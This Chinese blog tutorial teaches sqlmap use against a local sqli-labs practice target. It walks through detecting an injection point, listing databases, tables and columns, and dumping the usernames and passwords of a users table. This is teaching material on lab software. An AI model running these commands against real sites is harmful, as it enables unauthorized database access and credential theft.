首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >kali-sqlmap使用技巧整理

kali-sqlmap使用技巧整理

原创
作者头像
小胡爱学习
发布于 2022-09-30 08:37:15
发布于 2022-09-30 08:37:15
9030
举报
文章被收录于专栏:msraymsray
代码语言:html
AI代码解释
复制
什么是sql注入?
SQL 注入是一种代码渗透技术,是最常用的网络黑客技术之一。
SQL 注入非常危险,可能会导致数据库中的数据被暴露,甚至被损坏。


sql注入的危害?
SQL 注入会带来很多危害,包括但不限于:
骗过登录校验,查看用户登录后的详细信息(例如发布的评论、购买的商品、邮寄地址等),
这是 SQL 注入的最简单形式;
更新、删除和插入记录,破坏数据库中的数据;
在服务器上执行命令,该命令可以下载和安装木马等恶意程序;
将有价值的用户数据(例如邮箱、密码、信用卡等)导出到攻击者的远程计算机

测试地址: http://192.168.1.7/sqli-labs/Less-2/?id=2

代码语言:yaml
AI代码解释
复制
sqlmap -h         获取帮助
sqlmap -u "url"   检测注入点

--dbs             列出所有数据库的名字
--current-db      列出当前数据库的名字
-D                指定一个数据库
--tables          列出表名
-T                指定表名
--columns         列出所有的字段名
-C                指定字段
--dump            列出字段内容

sqlmap -h 获取帮助

sqlmap -h 获取帮助

在这里插入图片描述
在这里插入图片描述

检测注入点

sqlmap -u "url" 检测注入点

sqlmap -u "http://192.168.1.7/sqli-labs/Less-2/?id=2"

在这里插入图片描述
在这里插入图片描述

列出所有数据库的名字

sqlmap -u "http://192.168.1.7/sqli-labs/Less-2/?id=2" --dbs

在这里插入图片描述
在这里插入图片描述

列出当前数据库的名字

sqlmap -u "http://192.168.1.7/sqli-labs/Less-2/?id=2" --current-db

在这里插入图片描述
在这里插入图片描述

指定一个数据库列出表名

sqlmap -u "http://192.168.1.7/sqli-labs/Less-2/?id=2" -D "security" --tables

在这里插入图片描述
在这里插入图片描述

指定表名列出字段名

sqlmap -u "http://192.168.1.7/sqli-labs/Less-2/?id=2" -T users --columns

在这里插入图片描述
在这里插入图片描述

指定字段列出字段内容

sqlmap -u "http://192.168.1.7/sqli-labs/Less-2/?id=2" -D "security" -T "users" -C "username,password" --dump

在这里插入图片描述
在这里插入图片描述

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
ShardingSphere多数据源,读写分离等的实现
有关分表的实现可以参考Springboot2使用shardingsphere分表攻略
算法之名
2020/04/24
2.2K0
ShardingSphere多数据源,读写分离等的实现
sprinboot 之 mybatis plus + druid多数据源
0x01:引入 pom 依赖 <!-- 动态数据源 --> <dependency> <groupId>com.baomidou</groupId> <artifactId>dynamic-datasource-spring-boot-starter</artifactId> <version>2.5.4</version> </dependency> 0x02:yml配置文件 spring: autoconfigure: #自动化配置 例外处理
BUG弄潮儿
2022/02/10
4680
springboot集成druid配置多数据源连接
---- ##环境说明 jdk1.7, springboot1.5.8.RELEASE, druid1.1.5,nutz1.r.66 ##配置步骤 配置文件(application.properties) t1.data1.driver-class-name=oracle.jdbc.driver.OracleDriver t1.data1.url=jdbc:oracle:thin:@171.12.84.126:1521:ora11g t1.data1.username=oracle_78 t1.
用户5166556
2019/04/16
2.9K0
Springboot配置 Druid 数据源
注意:配置中都是以 spring.datasource.druid 开头,使用驼峰命名
崔笑颜
2020/06/08
1.6K0
spring-boot使用aop进行多数据源切换
创建一个spring boot项目,并引入druid mysql aop等相关依赖
earthchen
2020/09/24
1.3K0
【程序源代码】SpringBoot整合Mybatis
SpringBoot凭借"约定大于配置"的理念,已经成为最流行的web开发框架,所以有必须对其进行深入的了解;本文通过整合Mybatis类来分析SpringBoot提供的自动配置(AutoConfigure)功能,在此之前首先看一个整合Mybatis的实例。通过Mybatis实现简单的增删改查功能;
程序源代码
2020/05/18
1980
springBoot系列教程04:mybatis及druid数据源的集成及查询缓存的使用
首先说下查询缓存:查询缓存就是相同的数据库查询请求在设定的时间间隔内仅查询一次数据库并保存到redis中,后续的请求只要在时间间隔内都直接从redis中获取,不再查询数据库,提高查询效率,降低服务器负荷
肖哥哥
2018/08/02
8870
SpringBoot+Druid+Mybatis配置多数据源
我们在开发一个项目的时候,可能会遇到需要对多个数据库进行读写的需求,这时候就得在项目中配置多个数据源了。在Java项目的开发中,目前最常用的数据操作框架是 Mybatis,开发框架也都基本用上了SpringBoot。而Druid号称最好的数据库连接池,自然也是被广泛使用。
端碗吹水
2020/09/24
7.5K0
SpringBoot+Mybatis+ Druid+PageHelper 实现多数据源并分页
本篇文章主要讲述的是SpringBoot整合Mybatis、Druid和PageHelper 并实现多数据源和分页。其中SpringBoot整合Mybatis这块,在之前的的一篇文章中已经讲述了,这里就不过多说明了。重点是讲述在多数据源下的如何配置使用Druid和PageHelper 。
田维常
2019/07/16
1K0
SpringBoot+Mybatis+ Druid+PageHelper 实现多数据源并分页
SpringBoot集成Druid连接池
https://www.cnblogs.com/noneplus/p/11528129.html
Noneplus
2019/09/24
1.1K0
SpringBoot集成Druid连接池
SpringBoot2 配置多数据源,整合MybatisPlus增强插件
注意:mapper层和mapper.xml层分别放在不同目录下,以便mybatis扫描加载。
知了一笑
2019/10/14
2.6K0
SpringBoot2 配置多数据源,整合MybatisPlus增强插件
基于自定义注解和Aop动态数据源配置
基于自定义注解和Aop动态数据源配置         在实际项目中,经常会因为需要增强数据库并发能力而设计分库分表或者读写分离等策略,每在旧项目中引进新技术的时候都会带来一系列的问题,我们的目的就是去解决问题,带着思考方式去重构系统,从中找到乐趣,对应引进自定义注解和Aop动态数据源配置技术带来的问题,我会在文章末尾介绍,也希望大神给予正确的引导,我们当时的需求就是:有一个XXX旧系统,我们在这个旧系统的基础上开发一个PC端的程序用于收银;对方提供他们的数据库文档和对接人员,旧系统代码他们不给,我们只能通过
秋日芒草
2018/05/15
1.5K0
springboot+Druid+mybatis整合
git源码地址:https://gitee.com/wx-git/springboot
沁溪源
2020/09/02
5480
手把手教你玩多数据源动态切换!
TienChin 项目出视频啦~Spring Boot+Vue3,和松哥一起做一个完成率超 90% 的项目,戳戳戳这里-->TienChin 项目配套视频来啦。 ---- 为了提高应用的可靠性,多数据源现在也很常见,数据库可以搭建双 M 结构,这个松哥之前也发文和大家分享过如何搭建双 M 结构的主从备份?,那么 Java 代码里该如何操作多数据源呢? 我在 19 年的时候写过几篇文章教大家配置 JdbcTemplate、MyBatis 以及 JPA 中的多数据源(公众号江南一点雨后台回复 666 有相关的资
江南一点雨
2022/05/10
8270
SpringBoot 中使用 Druid 数据库连接池 步骤速查
Druid是阿里开源的一款数据库连接池,除了常规的连接池功能外,它还提供了强大的监控和扩展功能。这对没有做数据库监控的小项目有很大的吸引力。
水货程序员
2019/03/13
2.3K0
SpringBoot2集成Druid配置
Druid首先是Java语言中最好的数据库连接池,也是阿里巴巴的开源项目。Druid是阿里巴巴开发的号称为监控而生的数据库连接池,在功能、性能、扩展性方面,都超过其他数据库连接池,包括DBCP、C3P0、BoneCP、Proxool、JBoss DataSource等等等,秒杀一切。而且Druid已经在阿里巴巴部署了超过600个应用,经过好几年年生产环境大规模部署的严苛考验!
全栈程序员站长
2022/09/15
1.7K0
SpringBoot:配置数据源详解
对于数据访问层,无论是nosql还是sql数据库,SpringBoot的底层都是用Springdata去统一处理
冷环渊
2021/10/19
2.1K0
druid监控配置
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/163568.html原文链接:https://javaforall.cn
全栈程序员站长
2022/09/15
1.5K0
spring-boot2.0配置mybatis多数据源,使用druid连接池
https://blog.csdn.net/weixin_37664872/article/details/80088014
Java架构师必看
2021/05/14
8220
spring-boot2.0配置mybatis多数据源,使用druid连接池
一文说清楚配置数据源的参数
鉴于在开发环境中,我们都使用过yml配置文件,而且我们在yml配置文件中,都加入过连接数据库的配置,也就是配置我们的连接池,但是对于不同的数据库,连接数据库的 Jar 包也都是不一样的,而且对应的配置也是不一样的,今天阿粉就来说说这个 SpringBoot 项目中的,配置数据库连接的各种参数以及不同的数据库,应该是如何配置的。
Java极客技术
2023/02/23
6890
一文说清楚配置数据源的参数
推荐阅读
相关推荐
ShardingSphere多数据源,读写分离等的实现
更多 >
LV.0
这个人很懒,什么都没有留下~
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档